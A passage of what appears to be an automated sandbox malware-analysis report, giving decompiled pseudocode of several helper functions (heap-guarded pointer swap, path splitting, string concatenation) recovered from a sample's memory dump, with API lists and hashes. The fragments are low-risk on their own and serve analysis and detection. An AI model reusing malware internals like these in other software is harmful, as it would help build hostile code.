                				void** _t3;
                				void** _t5;
                				void** _t7;
                				void** _t8;
                				void* _t10;
                
                				_t3 =  *0x222a3cc; // 0x2bd9600
                				__imp__( &(_t3[0x10]));
                				while(1) {
                					_t5 =  *0x222a3cc; // 0x2bd9600
                					_t1 =  &(_t5[0x16]); // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t7 =  *0x222a3cc; // 0x2bd9600
                				_t10 =  *_t7;
                				if(_t10 != 0 && _t10 != 0x222b142) {
                					HeapFree( *0x222a2d8, 0, _t10);
                					_t7 =  *0x222a3cc; // 0x2bd9600
                				}
                				 *_t7 = _v0;
                				_t8 =  &(_t7[0x10]);
                				__imp__(_t8);
                				return _t8;
                			}

                0x0222607c
                0x02226085
                0x02226095
                0x02226095
                0x0222609a
                0x0222609f
                0x00000000
                0x00000000
                0x0222608f
                0x0222608f
                0x022260a1
                0x022260a6
                0x022260aa
                0x022260bd
                0x022260c3
                0x022260c3
                0x022260cc
                0x022260ce
                0x022260d2
                0x022260d8

                APIs
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 02226085
                • Sleep.KERNEL32(0000000A), ref: 0222608F
                • HeapFree.KERNEL32(00000000), ref: 022260BD
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 022260D2
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 28a5b77d0d944a6a48514a7d96ae443b7747892c40480eaaa2a157d4910c99f2
                • Instruction ID: 7b1a72f9865769e01daafeb62757ab129ebc8f630a4635ca6068527c5492e180
                • Opcode Fuzzy Hash: 28a5b77d0d944a6a48514a7d96ae443b7747892c40480eaaa2a157d4910c99f2
                • Instruction Fuzzy Hash: CBF03A75A90212BBE7388FD4F94DB2537B6BB44700F166804E802CB7A0C332A9ACDA14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E02222058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                				intOrPtr* _v8;
                				void* _t17;
                				intOrPtr* _t22;
                				void* _t27;
                				char* _t30;
                				void* _t33;
                				void* _t34;
                				void* _t36;
                				void* _t37;
                				void* _t39;
                				int _t42;
                
                				_t17 = __eax;
                				_t37 = 0;
                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                				_t2 = _t17 + 1; // 0x1
                				_t28 = _t2;
                				_t34 = E022233DC(_t2);
                				if(_t34 != 0) {
                					_t30 = E022233DC(_t28);
                					if(_t30 == 0) {
                						E022261DA(_t34);
                					} else {
                						_t39 = _a4;
                						_t22 = E02227AE9(_t39);
                						_v8 = _t22;
                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                							_a4 = _t39;
                						} else {
                							_t26 = _t22 + 2;
                							_a4 = _t22 + 2;
                							_t22 = E02227AE9(_t26);
                							_v8 = _t22;
                						}
                						if(_t22 == 0) {
                							__imp__(_t34, _a4);
                							 *_t30 = 0x2f;
                							 *((char*)(_t30 + 1)) = 0;
                						} else {
                							_t42 = _t22 - _a4;
                							memcpy(_t34, _a4, _t42);
                							 *((char*)(_t34 + _t42)) = 0;
                							__imp__(_t30, _v8);
                						}
                						 *_a8 = _t34;
                						_t37 = 1;
                						 *_a12 = _t30;
                					}
                				}
                				return _t37;
                			}

                Instruction addresses: 0x02222058, 0x02222062, 0x02222064, 0x0222206a, 0x0222206a, 0x02222073, 0x02222077, 0x02222083, 0x02222087, 0x022220fb, 0x02222089, 0x02222089, 0x0222208d, 0x02222092, 0x02222097, 0x022220b1, 0x022220a0, 0x022220a0, 0x022220a4, 0x022220a7, 0x022220ac, 0x022220ac, 0x022220b6, 0x022220de, 0x022220e4, 0x022220e7, 0x022220b8, 0x022220ba, 0x022220c2, 0x022220cd, 0x022220d2, 0x022220d2, 0x022220ee, 0x022220f5, 0x022220f6, 0x022220f6, 0x02222087, 0x02222106

                APIs
                • lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,022251F7,?,?,?,?,00000102,022221E7,?,?,74CF81D0), ref: 02222064
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                  • Part of subcall function 02227AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02222092,00000000,00000001,00000001,?,?,022251F7,?,?,?,?,00000102), ref: 02227AF7
                  • Part of subcall function 02227AE9: StrChrA.SHLWAPI(?,0000003F,?,?,022251F7,?,?,?,?,00000102,022221E7,?,?,74CF81D0,00000000), ref: 02227B01
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022251F7,?,?,?,?,00000102,022221E7,?), ref: 022220C2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 022220D2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 022220DE
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 64c0d3034f0612fc15cf611c18f2a06a5e77fbbc77c180563458f62866e5fb8d
                • Instruction ID: 56091cbe004cd94b6c4e1fa2b2611ae561542dc9b5c690964a47288f93dcded2
                • Opcode Fuzzy Hash: 64c0d3034f0612fc15cf611c18f2a06a5e77fbbc77c180563458f62866e5fb8d
                • Instruction Fuzzy Hash: 3B21F33252423AFBCB119FE4CC44A9ABFB9AF15350B148150FC049B219DB37DB48CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02225DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				void* _v8;
                				void* _t18;
                				int _t25;
                				int _t29;
                				int _t34;
                
                				_t29 = lstrlenW(_a4);
                				_t25 = lstrlenW(_a8);
                				_t18 = E022233DC(_t25 + _t29 + _t25 + _t29 + 2);
                				_v8 = _t18;
                				if(_t18 != 0) {
                					_t34 = _t29 + _t29;
                					memcpy(_t18, _a4, _t34);
                					_t10 = _t25 + 2; // 0x2
                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                				}
                				return _v8;
                			}

                Instruction addresses: 0x02225df9, 0x02225dfd, 0x02225e07, 0x02225e0c, 0x02225e11, 0x02225e13, 0x02225e1b, 0x02225e20, 0x02225e2e, 0x02225e33, 0x02225e3d

                APIs
                • lstrlenW.KERNEL32(004F0053,?,74CB5520,00000008,02BD9270,?,022252D0,004F0053,02BD9270,?,?,?,?,?,?,022268B6), ref: 02225DF4
                • lstrlenW.KERNEL32(022252D0,?,022252D0,004F0053,02BD9270,?,?,?,?,?,?,022268B6), ref: 02225DFB
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • memcpy.NTDLL(00000000,004F0053,74CB69A0,?,?,022252D0,004F0053,02BD9270,?,?,?,?,?,?,022268B6), ref: 02225E1B
                • memcpy.NTDLL(74CB69A0,022252D0,00000002,00000000,004F0053,74CB69A0,?,?,022252D0,004F0053,02BD9270), ref: 02225E2E
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: ca0f90d88e4f4eb6bec9198a43cbfbe322d623c6504b5c342edf4c3f9be26d11
                • Instruction ID: 59c2c4a7d5def03bb9b9c6fe10ed66e1c812b81444994bba4f3d79dc8d0447ad
                • Opcode Fuzzy Hash: ca0f90d88e4f4eb6bec9198a43cbfbe322d623c6504b5c342edf4c3f9be26d11
                • Instruction Fuzzy Hash: C7F03C72910129BB8F15DFE8CC84C9E7BADEF093547518062B90497115E736EA248BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(02BD9C10,00000000,00000000,00000000,02223EF9,00000000), ref: 02227573
                • lstrlen.KERNEL32(?), ref: 0222757B
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • lstrcpy.KERNEL32(00000000,02BD9C10), ref: 0222758F
                • lstrcat.KERNEL32(00000000,?), ref: 0222759A
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: d440ce43981e6523a3ef64d048cb52c3c04ed693fd7a49a74507839670aabe5a
                • Instruction ID: 44f3ad72a605b5ba1c7f3bf3df6c8f9dc25723e10b0086a482c873dfc7e3584b
                • Opcode Fuzzy Hash: d440ce43981e6523a3ef64d048cb52c3c04ed693fd7a49a74507839670aabe5a
                • Instruction Fuzzy Hash: 2FE065339016357B87215AE4AC4CC9BF66DEF896507050816F600D7100D73699198BA5
                Uniqueness

                Uniqueness Score: -1.00%